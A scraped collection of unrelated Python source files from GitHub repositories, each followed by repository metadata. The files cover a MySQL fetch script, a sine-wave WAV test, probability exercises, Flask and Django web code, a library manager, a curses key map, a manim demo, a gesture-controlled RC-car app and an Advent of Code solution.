cursorclass=pymysql.cursors.DictCursor)
content_df = pd.DataFrame(columns=('bulletin_id', 'content', 'partition_key'))
try:
with connection.cursor() as cursor:
sql = "SELECT * FROM `bidding_bulletin_text` where bulletin_id= %s"
            # Fetch 2000 records for testing
for index in range(2001):
cursor.execute(sql, (id_list[index],))
result = cursor.fetchone()
# print(result)
content_df.loc[index] = result
finally:
connection.close()
return content_df
if __name__ == '__main__':
id_list = get_id_list()
content_df = get_content_data(id_list)
content_df.to_excel(os.path.join(os.path.abspath('../..'), 'data', 'processed', 'content_text_data.xlsx'))
|
Kidron-Hou/category_division
|
src/data/get_content_data.py
|
get_content_data.py
|
py
| 1,684 |
python
|
en
|
code
| 0 |
github-code
|
6
|
3929047732
|
from .wav import write_sine_wave_wav_file
def test_sine():
import io
import time
buffer_size = io.DEFAULT_BUFFER_SIZE
filename = "test-5min-512hz-sr48khz-s24le-pcmdatagen.wav"
frequency = 512
sample_rate = 48000
duration = 5 * 60 * sample_rate # 5 minutes
bit_depth = 24
start_time = time.time()
with open(filename, "wb") as fp:
write_sine_wave_wav_file(
fp=fp,
frequency=frequency,
buffer_size=buffer_size,
sample_rate=sample_rate,
num_samples=duration,
bits_per_sample=bit_depth,
)
end_time = time.time()
print(f"Time taken: {end_time - start_time}")
def main():
return test_sine()
if __name__ == "__main__":
main()
|
louie-github/morsel
|
morsel/test_sine.py
|
test_sine.py
|
py
| 772 |
python
|
en
|
code
| 0 |
github-code
|
6
|
14489406692
|
#1)
import numpy as np
def polyfit_file(file, d):
data = np.loadtxt(file, float)
x = data[:,0]
y = data[:,1]
return np.polyfit(x, y, d)
#2)
import numpy as np
import random as rd
def flip_coin(N):
h=0.0
t=0.0
while h+t<N:
x=rd.randint(1,2)
if x==1:
h+=1
else:
t+=1
if N>10**6:
return None
else:
return h
#3)
import numpy as np
import random as rd
def rolling_dice(n, v):
attempt=0.0
doubles=0.0
while attempt<n:
x=rd.randint(1,6)
y=rd.randint(1,6)
attempt+=1
if x==y==v:
doubles+=1
if n<=10**6.0:
return doubles
else:
return None
def test_throw(n, v):
if 1<=v<=6 and n<10**6.0:
prob=rolling_dice(n, v)/n
return prob
else:
return None
#4)
import numpy as np
import random as rd
def MCint_pi(N):
M=0.0
attempt=0.0
while attempt<N:
x=rd.uniform(-1.0, 1.0)
y=rd.uniform(-1.0, 1.0)
attempt+=1.0
if (x**2.0+y**2.0)**(1.0/2.0)<=1:
M+=1.0
result=2*2*M/N
return result
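# Quick check (illustrative): the Monte Carlo estimate should approach pi as N grows.
if __name__ == "__main__":
    print(MCint_pi(100000))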
|
cameronfantham/PX150-Physics-Programming-Workshop
|
Task 4.py
|
Task 4.py
|
py
| 1,142 |
python
|
en
|
code
| 0 |
github-code
|
6
|
7784070706
|
"""MYAPP Core application logic."""
from json import (
JSONDecoder,
JSONEncoder,
loads as _json_loads,
)
from logging import getLogger
from pathlib import PosixPath
from http import HTTPStatus
from flask import Blueprint, current_app, request, Response
from flask.views import MethodView
from webargs.flaskparser import FlaskParser
from marshmallow import Schema, fields, pre_dump, RAISE, EXCLUDE
__all__ = [
'APP_PATH',
'APIMethodView',
'APIBlueprint',
'APIError',
'APIRequestSchema',
'APIResponseSchema',
'APIMetadataSchema',
'JSONEncoder',
'JSONDecoder',
'json_dump',
'json_dumps',
'json_loads',
'parse',
'log_request',
'log_response',
]
LOG = getLogger(__name__)
# ----------------------------------CONSTANTS----------------------------------
APP_PATH = PosixPath(__file__).parent
# ----------------------------------CONSTANTS----------------------------------
# -------------------------------WEBARGS SETTINGS-------------------------------
class APIRequestParser(FlaskParser):
def handle_error(self, error, req, schema, *, error_status_code, error_headers):
raise APIError(
'The request specification is invalid; check OpenAPI docs for more info.',
metadata={'errors': error.messages},
http_status=error_status_code or HTTPStatus.OK,
)
def parse_files(self, req, name, field):
raise NotImplementedError
parser = APIRequestParser()
parse = parser.use_args
# -------------------------------WEBARGS SETTINGS-------------------------------
# --------------------------------SERIALIZATION--------------------------------
class APIRequestSchema(Schema):
"""MYAPP base request schema."""
class Meta:
"""Raise on unknown parameters."""
unknown = RAISE
class APICommonRequestSchema(Schema):
"""MYAPP common request parameters."""
class Meta:
"""Do not react on unknown parameters."""
unknown = EXCLUDE
debug_tb_enabled = fields.Boolean(
required=False,
default=False,
)
class APIResponseSchema(Schema):
"""MYAPP base response schema."""
class Meta:
"""Exclude any unknown parameters."""
unknown = EXCLUDE
data = fields.Dict(
required=True,
default=dict,
)
metadata = fields.Nested(
'APIMetadataSchema',
required=True,
)
@classmethod
def default_metadata(cls):
"""
Create default metadata.
:return: metadata fallback
"""
return {
'status': 0,
'message': 'Nice',
'headers': {},
'errors': None,
'details': None,
}
@pre_dump
def pre_dump(self, response, many=None):
"""
Make pre dump handling.
:param response: raw response
:param many: is many
:return: enriched raw response
"""
_ = many
metadata = self.default_metadata()
response_metadata = response.get('metadata', {})
for field in 'status', 'message', 'headers', 'errors', 'details':
if field in response_metadata:
metadata[field] = response_metadata[field]
# FIXME: dynamic messages
if metadata['status'] and metadata['message'] == 'Nice':
metadata['message'] = 'Not nice'
response['metadata'] = metadata
return response
class APIMetadataSchema(Schema):
"""MYAPP Metadata schema."""
status = fields.Integer(
required=True,
default=0,
)
message = fields.String(
required=True,
default='Nice',
)
headers = fields.Dict(
required=True,
default=dict,
)
errors = fields.Dict(
required=True,
allow_none=True,
default=None,
)
details = fields.Dict(
required=True,
allow_none=True,
default=None,
)
# --------------------------------SERIALIZATION--------------------------------
# ------------------------FLASK AND APPLICATION GENERICS------------------------
class APIJSONEncoder(JSONEncoder):
"""MYAPP JSON Encoder."""
def __init__(
self,
*,
skipkeys=False,
check_circular=True,
allow_nan=True,
separators=None,
default=None,
):
"""
Initialize encoder.
:param skipkeys: is skip
:param check_circular: is check circular
:param allow_nan: is allow nan
:param separators: separator char
:param default: default value
"""
ensure_ascii = current_app.config['JSON_ENSURE_ASCII']
sort_keys = current_app.config['JSON_SORT_KEYS']
indent = current_app.config['JSON_INDENT']
super().__init__(
skipkeys=skipkeys,
ensure_ascii=ensure_ascii,
check_circular=check_circular,
allow_nan=allow_nan,
sort_keys=sort_keys,
indent=indent,
separators=separators,
default=default,
)
class APIJSONDecoder(JSONDecoder):
"""MYAPP JSON Decoder."""
def json_dumps(obj, **kwargs):
"""
MYAPP json dumps.
:param obj: object
:param kwargs: any
:return: json string
"""
return APIJSONEncoder(**kwargs).encode(obj)
def json_dump(obj, file, **kwargs):
"""
MYAPP json dump.
:param obj: python object
:param file: filename
:param kwargs: any
"""
for chunk in APIJSONEncoder(**kwargs).iterencode(obj):
file.write(chunk)
def json_loads(string, **kwargs):
"""
MYAPP json loads.
:param string: json string
:param kwargs: any
:return: dict
"""
return _json_loads(string, cls=APIJSONDecoder, **kwargs)
class APIMethodView(MethodView):
"""API Method View."""
decorators = (
parse(APICommonRequestSchema(), location='query'),
)
class APIBlueprint(Blueprint):
"""API Blueprint."""
def log_request():
"""Log request in curl-based fashion."""
msg = fr"curl -w '\n' -iX {request.method} '{request.url}' "
msg += ''.join(f"-H '{h}:{v}' " for h, v in request.headers.items())
if (
request.method in {'POST', 'PUT', 'PATCH'}
and request.headers.get('Content-Type') == 'application/json'
):
msg += f"-d '{request.data.decode('utf8')}'"
LOG.info(msg)
def log_response(response: Response):
"""
Log response json.
:param response: flask response
:return: flask response
"""
if response.is_json:
LOG.info(f'Response: {response.json}')
return response
# ------------------------FLASK AND APPLICATION GENERICS------------------------
# ---------------------------EXCEPTIONS AND MESSAGES---------------------------
class APIError(Exception):
"""Base API Exception."""
def __init__(self, *args, **kwargs):
"""
Initialize API exception.
:param args: any
:param kwargs: any
"""
schema = kwargs.pop('schema', APIResponseSchema())
data = kwargs.pop('data', {})
metadata = kwargs.pop('metadata', {})
metadata.setdefault('message', 'Error' if not args else args[0])
metadata.setdefault('status', 3)
self.json = schema.dump({'data': data, 'metadata': metadata})
self.http_status = kwargs.pop('http_status', HTTPStatus.OK)
super().__init__(*args)
# ---------------------------EXCEPTIONS AND MESSAGES---------------------------
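# Usage sketch (illustrative, not part of the module): raising APIError inside a view
# yields the {"data": ..., "metadata": ...} envelope defined above, assuming the
# application registers an error handler that returns `error.json` together with
# `error.http_status` (that wiring lives outside this module).
#
#   class PingView(APIMethodView):
#       def get(self, common_args):
#           if not common_args.get("debug_tb_enabled"):
#               raise APIError("Ping refused", metadata={"status": 1})
#           return {"data": {"pong": True}, "metadata": {}}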
|
jjj4x/flask_api_example
|
src/myapp/core.py
|
core.py
|
py
| 7,547 |
python
|
en
|
code
| 0 |
github-code
|
6
|
35614869771
|
"""
This will fetch database data from database
"""
from typing import List
from copy import deepcopy
from codegen.table.python_free_connex_table import PythonFreeConnexTable
from codegen.database import DatabaseDriver
from os import path
class DataFetcher:
def __init__(self, db_driver: DatabaseDriver):
"""
Construct a db fetcher instance. It requires to have a db driver input,
in order to fetch different files
:param db_driver: A db_driver, can be postgres_db_driver
"""
self.db_driver = db_driver
def store_data(self, output_dir: str, tables: List[PythonFreeConnexTable], should_write=True) -> List[
PythonFreeConnexTable]:
"""
        Perform a select on all tables and store the output data in [output_dir].
        Also returns a new list of tables with data_paths and data_sizes set.
        :type should_write: bool
:param output_dir: Output dir
:param tables: List of tables
:return:
"""
new_tables = deepcopy(tables)
for i, table in enumerate(tables):
if len(table.annotations) > 0:
annotations = ""
for index, annotation in enumerate(table.annotations):
annotations += f"{annotation} as {table.get_annotation_name(index)}"
if index < len(table.annotations) - 1:
annotations += ","
sql = f"select *, {annotations} from {table._table_name};"
else:
sql = f"select * from {table._table_name};"
output_path = path.join(output_dir, table.variable_table_name) + '.tbl'
size = 0
if should_write:
size = self.db_driver.execute_save(sql=sql, output_filename=output_path)
new_tables[i].data_paths = [output_path]
new_tables[i].data_sizes = [size]
return new_tables
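# Usage sketch (illustrative; requires a concrete DatabaseDriver implementation,
# such as the postgres driver mentioned in __init__'s docstring, plus a list of
# PythonFreeConnexTable objects):
#
#   fetcher = DataFetcher(db_driver)
#   tables_with_data = fetcher.store_data(output_dir="/tmp/output", tables=tables)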
|
secyan/secyan_gen
|
codegen/utils/DataFetcher.py
|
DataFetcher.py
|
py
| 1,945 |
python
|
en
|
code
| 2 |
github-code
|
6
|
29446328549
|
# -*- coding: utf-8 -*-
import sys
import cv2
import mediapipe as mp
import re
import time
import threading
from PySide2 import QtCore, QtGui, QtWidgets
from PySide2.QtCore import *
from PySide2.QtGui import *
from PySide2.QtWidgets import *
from selenium import webdriver
from lib.handsign.gesture import define_gesture, find_gesture, handedness
from lib.sr.SR_edsr import sr_work
from socket import *
## ==> SPLASH SCREEN
from lib.ui.ui_splash_screen import Ui_SplashScreen
## ==> MAIN WINDOW
from lib.ui.ui_main import Ui_MainWindow
# Create Socket
clientSock = socket(AF_INET, SOCK_STREAM)
url = '192.168.43.145'
clientSock.connect((url, 2000))
mp_drawing = mp.solutions.drawing_utils
mp_hands = mp.solutions.hands
## ==> GLOBALS
counter = 0
hands = None
cap_hand = None
cap_situ = None
right_prev = None
left_prev = None
left_count = 0
#Camera Command
camera_left = 0
camera_right = 0
camera_center = 0
# YOUR APPLICATION
class MainWindow(QMainWindow):
def __init__(self):
QMainWindow.__init__(self)
self.ui = Ui_MainWindow()
self.ui.setupUi(self)
self.logic_btn = False
# self.logic_dr = False
self.case = 0
        # Run the handler when the button is clicked
self.ui.pushButton.clicked.connect(self.btnClicked)
# self.ui.pushButton_2.clicked.connect(self.drClicked)
# set warning
self.ui.warning.setVisible(False)
# self.ui.warning.setVisible(False)
# set wait
self.ui.wait.setVisible(False)
def start(self):
global cap_hand
global cap_situ
global hands
global right_prev
global left_prev
global left_count
global camera_center
global camera_left
global camera_right
turn_on_esp = 0
while cap_hand.isOpened():
success, image = cap_hand.read()
success2, image2 = cap_situ.read()
if not success:
break
if not success2:
break
if success:
if turn_on_esp == 0:
esp_trd = threading.Thread(target=esp32_video, name="[Daemon2]", args=())
esp_trd.setDaemon(True)
esp_trd.start()
turn_on_esp += 1
# Resize Image
image = cv2.resize(image, dsize=(800, 600))
# Flip the image horizontally for a later selfie-view display, and convert
# the BGR image to RGB.
image = cv2.cvtColor(cv2.flip(image, 1), cv2.COLOR_BGR2RGB)
# To improve performance, optionally mark the image as not writeable to
# pass by reference.
image.flags.writeable = False
results = hands.process(image)
# Draw the hand annotations on the image.
image.flags.writeable = True
image = cv2.cvtColor(image, cv2.COLOR_RGB2BGR)
landmark = []
landmark_list = []
cnt = 0
cnt2 = 0
# Count number of loop when left hand gesture is not used
left_count += 1
# Interpret Hand Gesture & Control RC Car
if results.multi_hand_landmarks:
for hand_landmarks in results.multi_hand_landmarks:
for i in str(hand_landmarks).split():
                            is_num = bool(re.findall(r'\d+', i))
# Extract landmarks
if is_num is True:
if cnt < 3 and cnt2 == 0:
landmark.append(float(i))
cnt += 1
elif cnt == 3 and cnt2 == 0:
cnt2 = 1
elif cnt == 3 and cnt2 == 1:
cnt = 0
cnt2 = 0
if len(landmark) == 3:
landmark_list.append(landmark)
landmark = []
# Right Hand Gesture Controls
if find_gesture(define_gesture(landmark_list),
handedness(landmark_list[0], landmark_list[1])) != "None" and\
handedness(landmark_list[0], landmark_list[1]) == 'right':
cmd = find_gesture(define_gesture(landmark_list),
handedness(landmark_list[0], landmark_list[1]))
if right_prev != cmd:
right_prev = cmd
# Create Thread
t = threading.Thread(target=url_command_right, name="[Daemon]", args=(cmd,))
t.setDaemon(True)
t.start()
# Left Hand Gesture Controls
if find_gesture(define_gesture(landmark_list),
handedness(landmark_list[0], landmark_list[1])) != "None" and\
handedness(landmark_list[0], landmark_list[1]) == 'left':
cmd = find_gesture(define_gesture(landmark_list),
handedness(landmark_list[0], landmark_list[1]))
# Camera Command
if cmd == "Camera_LEFT" or cmd == "Camera_RIGHT" or cmd == "Camera_CENTER":
if cmd == "Camera_LEFT" and camera_left == 0:
left_prev = cmd
left_count = 0
camera_left = 1
camera_right = 0
camera_center = 0
# Create Thread
t = threading.Thread(target=url_command_left, name="[Daemon5]", args=(cmd,))
t.setDaemon(True)
t.start()
elif cmd == "Camera_RIGHT" and camera_right == 0:
left_prev = cmd
left_count = 0
camera_left = 0
camera_right = 1
camera_center = 0
# Create Thread
t = threading.Thread(target=url_command_left, name="[Daemon6]", args=(cmd,))
t.setDaemon(True)
t.start()
elif cmd == "Camera_CENTER" and camera_center == 0:
left_prev = cmd
left_count = 0
camera_left = 0
camera_right = 0
camera_center = 1
# Create Thread
t = threading.Thread(target=url_command_left, name="[Daemon7]", args=(cmd,))
t.setDaemon(True)
t.start()
if cmd == "Capture" and left_count > 3:
left_prev = cmd
left_count = 0
img_name = 'image/input.png'
cv2.imwrite(img_name, image2)
# SR Command
if left_prev != cmd and (cmd != "Camera_LEFT" or cmd != "Camera_RIGHT" or cmd != "Capture"):
left_prev = cmd
if cmd == "Work SR Engine":
t = threading.Thread(target=sr_work, name="[Daemon4]", args=())
t.setDaemon(True)
t.start()
self.ui.wait.setVisible(True)
if cmd == "SR Done":
self.ui.wait.setVisible(False)
print(find_gesture(define_gesture(landmark_list),
handedness(landmark_list[0], landmark_list[1])))
print(handedness(landmark_list[0], landmark_list[1]))
self.ui.cmd.setText(f"{find_gesture(define_gesture(landmark_list), handedness(landmark_list[0], landmark_list[1]))}\n"
f"{handedness(landmark_list[0], landmark_list[1])}")
self.ui.cmd.setAlignment(QtCore.Qt.AlignHCenter | QtCore.Qt.AlignVCenter)
self.ui.cmd.repaint()
mp_drawing.draw_landmarks(
image, hand_landmarks, mp_hands.HAND_CONNECTIONS)
self.displayHandSign(image)
self.displayCCTV(image2)
#self.displayRCCAR(image2)
self.displayCaptureImg()
self.displaySRImg()
#Keyboard
k = cv2.waitKey(0)
if k % 256 == 27:
# esc pressed --> break
break
elif k % 256 == 32:
# space pressed --> capture
img_name = '../../image/input.png'
cv2.imwrite(img_name, image)
hands.close()
cap_hand.release()
cap_situ.release()
cv2.destroyAllWindows()
def btnClicked(self):
if self.logic_btn == True:
self.logic_btn = False
# self.ui.rccarCam.setPixmap(None)
self.case += 1
self.ui.lcdNumber.display(self.case)
self.ui.warning.setVisible(False)
# self.ui.wait.setVisible(False)
# space pressed --> capture
else:
self.logic_btn = True
self.ui.warning.setVisible(True)
# self.ui.wait.setVisible(True)
def displayHandSign(self, img):
qformat = QImage.Format_Indexed8
if len(img.shape) == 3:
if img.shape[2] == 4:
qformat = QImage.Format_RGBA8888
else:
qformat = QImage.Format_RGB888
img = QImage(img, img.shape[1], img.shape[0], qformat)
img = img.rgbSwapped()
w = self.ui.handSign.width()
h = self.ui.handSign.height()
self.ui.handSign.setPixmap(QPixmap.fromImage(img).scaled(w, h, Qt.KeepAspectRatioByExpanding))
# self.ui.handSign.setPixmap(QPixmap.fromImage(img))
        # center alignment
self.ui.handSign.setAlignment(QtCore.Qt.AlignHCenter | QtCore.Qt.AlignVCenter)
def displayRCCAR(self, img):
qformat = QImage.Format_Indexed8
if len(img.shape) == 3:
if img.shape[2] == 4:
qformat = QImage.Format_RGBA8888
else:
qformat = QImage.Format_RGB888
img = QImage(img, img.shape[1], img.shape[0], qformat)
img = img.rgbSwapped()
w = self.ui.handSign.width()
h = self.ui.handSign.height()
self.ui.cctv.setPixmap(QPixmap.fromImage(img).scaled(w, h, Qt.KeepAspectRatioByExpanding))
# self.ui.cctv.setPixmap(QPixmap.fromImage(img))
        # center alignment
self.ui.cctv.setAlignment(QtCore.Qt.AlignHCenter | QtCore.Qt.AlignVCenter)
# self.ui.situation2.setPixmap(QPixmap.fromImage(img))
# # 가운데 맞춤
# self.ui.situation2.setAlignment(QtCore.Qt.AlignHCenter | QtCore.Qt.AlignVCenter)
def displayCCTV(self, img):
qformat = QImage.Format_Indexed8
if len(img.shape) == 3:
if img.shape[2] == 4:
qformat = QImage.Format_RGBA8888
else:
qformat = QImage.Format_RGB888
img = QImage(img, img.shape[1], img.shape[0], qformat)
img = img.rgbSwapped()
w = self.ui.handSign.width()
h = self.ui.handSign.height()
self.ui.rccarCam.setPixmap(QPixmap.fromImage(img).scaled(w, h, Qt.KeepAspectRatioByExpanding))
# self.ui.rccarCam.setPixmap(QPixmap.fromImage(img))
        # center alignment
self.ui.rccarCam.setAlignment(QtCore.Qt.AlignHCenter | QtCore.Qt.AlignVCenter)
def displayCaptureImg(self):
        img = QPixmap('../../image/input.png')
w = self.ui.cap_img.width()
h = self.ui.cap_img.height()
self.ui.cap_img.setPixmap(img.scaled(w, h, Qt.KeepAspectRatioByExpanding))
        # center alignment
self.ui.cap_img.setAlignment(QtCore.Qt.AlignHCenter | QtCore.Qt.AlignVCenter)
def displaySRImg(self):
        img = QPixmap('../../image/upscaled.png')
w = self.ui.sr_img.width()
h = self.ui.sr_img.height()
self.ui.sr_img.setPixmap(img.scaled(w, h, Qt.KeepAspectRatioByExpanding))
        # center alignment
self.ui.sr_img.setAlignment(QtCore.Qt.AlignHCenter | QtCore.Qt.AlignVCenter)
# SPLASH SCREEN
class SplashScreen(QMainWindow):
def __init__(self):
QMainWindow.__init__(self)
self.ui = Ui_SplashScreen()
self.ui.setupUi(self)
## REMOVE TITLE BAR
self.setWindowFlag(QtCore.Qt.FramelessWindowHint)
self.setAttribute(QtCore.Qt.WA_TranslucentBackground)
## DROP SHADOW EFFECT
self.shadow = QGraphicsDropShadowEffect(self)
self.shadow.setBlurRadius(20)
self.shadow.setXOffset(0)
self.shadow.setYOffset(0)
self.shadow.setColor(QColor(0, 0, 0, 60))
self.ui.dropShadowFrame.setGraphicsEffect(self.shadow)
## QTIMER ==> START
self.timer = QtCore.QTimer()
self.timer.timeout.connect(self.progress)
# TIMER IN MILLISECONDS
self.timer.start(35)
# # Change Texts
# QtCore.QTimer.singleShot(1500, lambda: self.ui.label_description.setText("<strong>LOADING</strong> DATABASE"))
# QtCore.QTimer.singleShot(3000, lambda: self.ui.label_description.setText("<strong>LOADING</strong> USER INTERFACE"))
## SHOW ==> MAIN WINDOW
self.show()
## ==> APP FUNCTIONS
def progress(self):
global counter
global hands
global cap_hand
global cap_situ
# SET VALUE TO PROGRESS BAR
self.ui.progressBar.setValue(counter)
if hands is None:
self.ui.label_loading.setText("load mediapipe...")
self.ui.label_loading.repaint()
hands = mp_hands.Hands(
min_detection_confidence=0.7, min_tracking_confidence=0.5)
cap_hand = cv2.VideoCapture(0)
cap_situ = cv2.VideoCapture(1)
counter = 20
self.ui.label_loading.setText("loading...")
        # CLOSE SPLASH SCREEN AND OPEN APP
if counter > 100:
# STOP TIMER
self.timer.stop()
# SHOW MAIN WINDOW
self.main = MainWindow()
self.main.show()
# CLOSE SPLASH SCREEN
self.close()
# START MAIN SCREEN
self.main.start()
# INCREASE COUNTER
counter += 4
def url_command_right(cmd):
try:
clientSock.send(cmd.encode('utf-8'))
except:
print("\n\n\n\nException Occur\n\n\n\n")
def url_command_left(cmd):
try:
clientSock.send(cmd.encode('utf-8'))
time.sleep(10)
except:
print("\n\n\n\nException Occur\n\n\n\n")
def esp32_video():
# change to your ESP32-CAM ip
wd = webdriver.Chrome(r'C:\Users\jji44\Desktop\chromedriver.exe')
url = 'http://192.168.43.159:81/stream'
wd.set_window_size(400, 400)
#wd.set
wd.get(url)
# url = "http://192.168.0.152:81/stream"
# CAMERA_BUFFRER_SIZE = 4096#4096
# stream = urlopen(url)
# bts = b''
#
# while True:
# try:
# bts += stream.read(CAMERA_BUFFRER_SIZE)
# jpghead = bts.find(b'\xff\xd8')
# jpgend = bts.find(b'\xff\xd9')
# if jpghead > -1 and jpgend > -1:
# jpg = bts[jpghead:jpgend + 2]
# bts = bts[jpgend + 2:]
# image3 = cv2.imdecode(np.frombuffer(jpg, dtype=np.uint8), cv2.IMREAD_UNCHANGED)
# image3 = cv2.resize(image3, (640, 480))
# MainWindow.displayRCCAR(window.main, image3)
# except Exception as e:
# print("Error:" + str(e))
# bts = b''
# stream = urlopen(url)
# continue
if __name__ == "__main__":
app = QApplication(sys.argv)
window = SplashScreen()
try:
sys.exit(app.exec_())
except:
        print('exiting')
|
cheeseBG/EmergencyResponseSystem
|
main.py
|
main.py
|
py
| 17,061 |
python
|
en
|
code
| 1 |
github-code
|
6
|
39635306222
|
from datetime import datetime
from django.http import Http404, HttpResponse, HttpResponseRedirect
from django.shortcuts import render
from django.template import loader
from django.urls import reverse
from .models import BusinessIdea
# Create your views here.
def list(request):
ideas_list = BusinessIdea.objects.order_by("-publish_date")[:10]
template = loader.get_template('ideas/list.html')
context = {
'ideas_list': ideas_list,
}
return HttpResponse(template.render(context, request))
def idea(request, idea_id):
try:
        idea = BusinessIdea.objects.get(pk=idea_id)
except BusinessIdea.DoesNotExist:
raise Http404("Idea does not exist")
#comments = IdeaComment.objects.filter()
print(idea.__dir__())
return render(request, 'ideas/detail.html', {"idea": idea, "comments": ""})
def idea_new(request):
return render(request, "ideas/idea_new.html")
def idea_new_post(request):
print(request.POST.keys())
try:
username = request.POST['username']
title = request.POST["title"]
body = request.POST["body"]
    except KeyError:
# Redisplay the form.
return render(request, 'ideas/idea_new.html', {
'error_message': "Invalid form.",
})
newIdea = BusinessIdea(
username = username,
title = title,
body = body,
publish_date = datetime.now()
)
newIdea.save()
context = {
"idea": newIdea
}
return HttpResponseRedirect(reverse("ideas:idea", args=(newIdea.id,)))
|
Gael-Bernard/business_ideas_upm
|
business_ideas_upm/ideas/views.py
|
views.py
|
py
| 1,571 |
python
|
en
|
code
| 0 |
github-code
|
6
|
38093763953
|
from book import Book
class Library:
def __init__(self, books_list, readers_list):
self.books_list = books_list
self.readers_list = readers_list
def add_book_to_library(self):
book_id, book_name, book_author, book_date = input("Please enter book id, title, author name, year of edition "
"split by comma as in the example '4,River,Anthony Bach,"
"1956': ").split(',')
        book = Book(int(book_id), book_name, book_author, book_date, None)  # cast id to int so lookups by numeric id match
return self.books_list.append(book)
def delete_book_from_library(self):
book_id = input("Please enter book id: ")
for book in self.books_list:
if book.book_id == int(book_id):
self.books_list.remove(book)
@staticmethod
def ask_for_ids():
while True:
book_id, reader_id = input("Please enter book id and reader id split by comma: ").split(',')
if book_id.isdigit() and reader_id.isdigit():
return int(book_id), int(reader_id)
else:
print("You have entered not a valid positive integers as ids.")
def give_book_to_reader(self, book_id, reader_id):
for book in self.books_list:
if book.book_id == book_id and book.book_id_reader is not None:
print("This book is already taken.")
break
elif book.book_id == book_id:
book.book_id_reader = reader_id
for reader in self.readers_list:
if reader.reader_id == reader_id:
reader.reader_book_id = book_id
def take_book_from_reader(self, book_id, reader_id):
for book in self.books_list:
if book.book_id == book_id and book.book_id_reader is None:
print("This book is not taken.")
break
elif book.book_id == book_id:
book.book_id_reader = None
for reader in self.readers_list:
if reader.reader_id == reader_id:
reader.reader_book_id = None
def print_all_books(self):
for book in self.books_list:
print(book.book_id, book.book_name, book.book_author, book.book_date, book.book_id_reader)
def print_books_in_library(self):
for book in self.books_list:
if book.book_id_reader is None:
print(book.book_id, book.book_name, book.book_author, book.book_date, book.book_id_reader)
def print_taken_books(self):
for book in self.books_list:
if book.book_id_reader is not None:
print(book.book_id, book.book_name, book.book_author, book.book_date, book.book_id_reader)
def sort_books_by_name(self):
for book in sorted(self.books_list, key=lambda x: x.book_name):
print(book.book_id, book.book_name, book.book_author, book.book_date, book.book_id_reader)
def sort_books_by_author(self):
for book in sorted(self.books_list, key=lambda x: x.book_author):
print(book.book_id, book.book_name, book.book_author, book.book_date, book.book_id_reader)
def sort_books_by_date(self):
for book in sorted(self.books_list, key=lambda x: x.book_date):
print(book.book_id, book.book_name, book.book_author, book.book_date, book.book_id_reader)
def delete_reader(self):
reader_id = input("Please enter reader id: ")
for reader in self.readers_list:
if reader.reader_id == int(reader_id):
self.readers_list.remove(reader)
def print_all_readers(self):
for reader in self.readers_list:
print(reader.reader_id, reader.first_name, reader.last_name, reader.birth_year, reader.reader_book_id)
def print_readers_with_book(self):
for reader in self.readers_list:
if reader.reader_book_id is not None:
print(reader.reader_id, reader.first_name, reader.last_name, reader.birth_year, reader.reader_book_id)
|
alisa-moto/python-adnanced
|
HW_02/library.py
|
library.py
|
py
| 4,100 |
python
|
en
|
code
| 0 |
github-code
|
6
|
33937872661
|
"""
Returns a dictionary of the keyboard
mapped to its ord() value.
string DATA
ascii_letters = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ'
ascii_lowercase = 'abcdefghijklmnopqrstuvwxyz'
digits = '0123456789'
hexdigits = '0123456789abcdefABCDEF'
letters = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ'
octdigits = '01234567'
printable = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTU...
punctuation = '!"#$%&\'()*+,-./:;<=>?@[\\]^_`{|}~'
uppercase = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ'
whitespace = '\t\n\x0b\x0c\r '
"""
import string
import curses
class Key():
def __init__(self):
self.key = {}
for k in string.printable:
self.key[k] = ord(k)
for k in dir(curses):
if 'KEY_' in k:
name = k.split('_')[1].lower()
self.key[name] = getattr(curses, k)
return
key = Key().key
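# Minimal usage sketch: look up a few printable characters and special keys in
# the mapping built above. Which curses KEY_* names are available depends on
# the curses build, so 'up' and 'down' are only assumed to exist here.
if __name__ == '__main__':
    print(key['a'])         # 97, i.e. ord('a')
    print(key['0'])         # 48
    print(key.get('up'))    # curses.KEY_UP, when defined
    print(key.get('down'))  # curses.KEY_DOWN, when defined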
|
cameronbriar/curses
|
examples/key.py
|
key.py
|
py
| 934 |
python
|
en
|
code
| 0 |
github-code
|
6
|
71066840189
|
import numpy as np
from examples.example_imports import *
scene = EagerModeScene()
scene.save_default_config()
number = DecimalNumber(0).scale(2)
scene.add(number)
scene.wait()
print(np.linspace(0, 10, 4))
scene.play(ChangingDecimal(number, lambda x: x*10), run_time=4)
scene.hold_on()
|
beidongjiedeguang/manim-express
|
examples/animate/demo_numbers.py
|
demo_numbers.py
|
py
| 291 |
python
|
en
|
code
| 13 |
github-code
|
6
|
43555685205
|
class Robot:
"""
+Y
90
N
^
-X 180 W < * > E 0 +X
v
S
270
-Y
"""
# dirname => (dx, dy)
directions_to_deltas = {
'E': (1, 0),
'N': (0, 1),
'W': (-1, 0),
'S': (0, -1)
}
def __init__(self, instructions):
self.instructions = instructions
self.x = 0
self.y = 0
self.wx = 10
self.wy = 1
def execute_command(self, cmd, val):
if cmd in {'N', 'S', 'E', 'W'}:
dx, dy = self.directions_to_deltas[cmd]
self.wx += dx * val
self.wy += dy * val
elif cmd in {'L', 'R'}:
normal_val = val if cmd == 'R' else (val * -1) % 360
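            # Rotating the waypoint (wx, wy) about the ship clockwise by 90
            # degrees maps it to (wy, -wx); 180 degrees negates both
            # components; 270 degrees clockwise maps it to (-wy, wx).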
if normal_val == 90:
temp = self.wx
self.wx = self.wy
self.wy = -1 * temp
elif normal_val == 180:
self.wx *= -1
self.wy *= -1
elif normal_val == 270:
temp = self.wx
self.wx = -1 * self.wy
self.wy = temp
else:
raise ValueError("I don't know how to rotate {val} degrees!")
elif cmd == 'F':
self.x += val * self.wx
self.y += val * self.wy
else:
raise ValueError("Unrecognized command {cmd}")
self.print_state(cmd,val)
def run_to_completion(self):
for cmd, val in self.instructions:
self.execute_command(cmd, val)
def print_state(self, cmd, val):
print(f"After {cmd, val}\n Pos: {self.x, self.y}\n Way: {self.wx, self.wy}\n")
def main():
instructions = []
with open("input.txt") as file:
for line in file:
instructions.append((line[:1], int(line[1:].strip())))
robot = Robot(instructions)
robot.run_to_completion()
m_dist = abs(robot.x) + abs(robot.y)
print(f"Coord: ({robot.x}, {robot.y}) Man_Distance: {m_dist}")
if __name__ == "__main__":
main()
|
ruke47/advent-of-code-2020
|
12/2.py
|
2.py
|
py
